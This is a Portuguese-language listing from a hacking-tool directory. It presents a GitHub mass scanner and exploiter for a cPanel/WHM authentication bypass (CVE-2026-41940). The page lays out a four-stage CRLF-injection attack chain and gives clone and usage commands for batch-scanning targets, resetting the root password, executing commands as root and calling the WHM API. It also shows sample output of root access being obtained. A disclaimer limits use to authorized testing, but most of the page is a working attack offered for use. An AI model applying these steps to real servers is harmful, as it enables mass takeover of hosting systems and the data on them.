Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41940 — cPanel/WHM CVE-2026-41940 - Scanner em Massa e Explorador | Kitploit
Ferramentas/GitHubGitHub/lutfifakee-project/cve-2026-41940
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoComando e ControleAutenticaçãoRed TeamingDesenvolvimento de Payloads
GitHublutfifakee-project/cve-2026-41940

CVE-2026-41940

cPanel/WHM CVE-2026-41940 - Scanner em Massa e Explorador

2há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver RepositórioSite

CVE-2026-41940 - Ferramenta de Scanner e Exploit de Bypass de Autenticação cPanel/WHM

Python License Security Tested on

Ferramenta de Scanner e Exploit de Bypass de Autenticação cPanel/WHM para CVE-2026-41940


⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e testes de segurança autorizados.

Ao usar esta ferramenta, você concorda que:

  • Você só testará sistemas que possui ou para os quais tem permissão explícita por escrito para testar.
  • Você entende que o acesso não autorizado a sistemas de computador é ilegal.
  • Você é o único responsável por suas ações ao usar esta ferramenta.
  • Você não pode redistribuir, modificar ou reivindicar esta ferramenta como sua.

❗ O autor NÃO é responsável por qualquer uso indevido, atividades ilegais, danos ou consequências legais resultantes do uso desta ferramenta.


🎯 Visão Geral

CVE-2026-41940 é uma vulnerabilidade crítica de bypass de autenticação no cPanel/WHM que pode permitir que atacantes obtenham acesso não autorizado de nível root sem credenciais válidas.

Esta ferramenta fornece uma implementação baseada em Python para:

  • Detectar alvos vulneráveis
  • Automatizar a exploração (para testes autorizados)
  • Realizar varreduras em larga escala

🔥 Cadeia de Ataque em 4 Estágios


✨ Recursos


📋 Requisitos

root@kitploit:~
Python 3.7+
pip install requests urllib3

🚀 Instalação

root@kitploit:~
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt

# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com

📖 Uso

Comandos Básicos

root@kitploit:~
# Single target
python cpanel-mass-checker.py -u https://target.com:2087

# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20

# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt

# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com

# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com

# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com

# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com

📄 Formato do Arquivo de Alvos (targets.txt)

root@kitploit:~
# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083

⚙️ Parâmetros


📊 Exemplo de Saída

Varredura em Lote

root@kitploit:~
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt

Geração de URL de Sessão

root@kitploit:~
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
    https://example.com:2087/cpsessXXXXXXX/

🛡️ Detalhes da Vulnerabilidade

CampoValor
CVECVE-2026-41940
SeveridadeCrítica (CVSS 9.8)
Vetor de AtaqueRede
Privilégios Necessários

Versões Afetadas

  • WHM 11.110.x < 11.110.0.97
  • WHM 11.118.x < 11.118.0.63
  • WHM 11.126.x < 11.126.0.54
  • WHM 11.132.x < 11.132.0.29
  • WHM 11.134.x < 11.134.0.20
  • WHM 11.136.x < 11.136.0.5

⚠️ Notas Importantes

  • Use apenas em sistemas autorizados
  • Os tokens de sessão expiram rapidamente
  • O RCE pode falhar em licenças restritas
  • Alguns alvos exigem -hostname
  • Todo o tráfego usa HTTPS

🧪 Ambiente de Teste

Para testes seguros e legais:

  • Use seu próprio VPS/servidor
  • Configure um ambiente de laboratório vulnerável
  • Sempre obtenha permissão por escrito

⭐ Suporte

Se este projeto ajudou você, considere dar uma ⭐

Baixar ferramenta
EstágioDescrição
1. Pré-autenticaçãoEnviar credenciais inválidas para /login/ para obter o cookie whostmgrsession
2. Injeção CRLFInjetar nova linha via cabeçalho Authorization: Basic para vazar o token cpsess
3. Propagação de TokenAcionar do_token_denied para propagar o token no cache
4. VerificaçãoAcessar /json-api/version para confirmar acesso root ao WHM
RecursoDescrição
🔄 Varredura em LoteEscanear vários alvos simultaneamente
🎯 Alvo ÚnicoEscanear um alvo individual com saída detalhada
🔌 Varredura de PortasEscanear automaticamente portas do WHM (2082, 2083, 2086, 2087)
🔓 URL de SessãoGerar URL de login do WHM com um clique
💀 RCEExecutar comandos do sistema como root
🔑 Alterar SenhaModificar a senha root do WHM
📡 Chamadas à API do WHMChamar funções da API do WHM
🎨 Saída ColoridaSaída visual para os resultados
💾 Exportar ResultadosSalvar alvos vulneráveis em arquivo
ParâmetroDescriçãoExemplo
-uURL de um único alvo-u https://target.com:2087
-fArquivo de lista de alvos-f targets.txt
-cConcorrência (threads)-c 20
-oArquivo de saída-o results.txt
-hostnameCabeçalho Host personalizado-hostname cpanel.target.com
--scan-portsEscanear todas as portas do WHM--scan-ports
-sessionGerar URL de login-session
-passwdAlterar senha root-passwd "NewPass123"
-cmdExecutar comando-cmd "id"
-keepManter conta temporária-keep
-apiChamar API do WHM-api listaccts
-api-paramsParâmetros da API-api-params "user=root,password=123"
Nenhum
Interação do UsuárioNenhuma